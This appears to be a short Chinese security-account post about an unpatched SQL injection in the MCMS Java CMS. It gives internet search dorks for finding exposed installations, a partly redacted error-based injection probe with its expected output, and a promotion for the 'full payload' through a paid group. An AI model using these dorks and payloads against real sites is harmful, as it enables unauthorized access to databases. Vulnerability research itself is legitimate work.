感谢您抽出
阅读本文
MCMS是一个<完整开源的Java CMS!基于SpringBoot 2架构,前端基于vue、element ui。MCMS存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息等。目前厂商暂未发布修复措施解决此安全问题,建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法。
漏洞复现
「Fofa」
body="/static/plugins/ms/1.0.0/ms.js"
「零零信安」
(html_banner==/static/plugins/ms/1.0.0/ms.js)
这类会员账号均可在吉吉安全团队圈子获取(文末有介绍)
「poc攻击」
「poc(完整poc文末获取)」
/xxx/xxx/xxx?x=c&xxxxType=xxx&xxxxxBy=0%20or%20updatexml(1,concat(0x7e,(SELECT%20md5(233)),0x7e),1)
在浏览器中f12打开hackbar,输入网址以及poc,点击execute,如果出现e165421110ba03099a1c0393373c5b4则表明漏洞存在(看不懂可以看历史文章,有详细教学)
完整攻击载荷获取
公众号:【吉吉说安全】,对我发消息【20240412】免费获取完整攻击载荷」
「你即将失去如下所有学习变强机会」
学习效率低,学不到实战内容,花几千、上万报机构没有性价比
一顿自助钱,我承诺一定让用户满意,也希望用户能给予我一份信任
【详情下方图片了解】,【扫下方二维码加入】:只做高质量优质精品内容」
免费红队知识库:
免责声明
由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!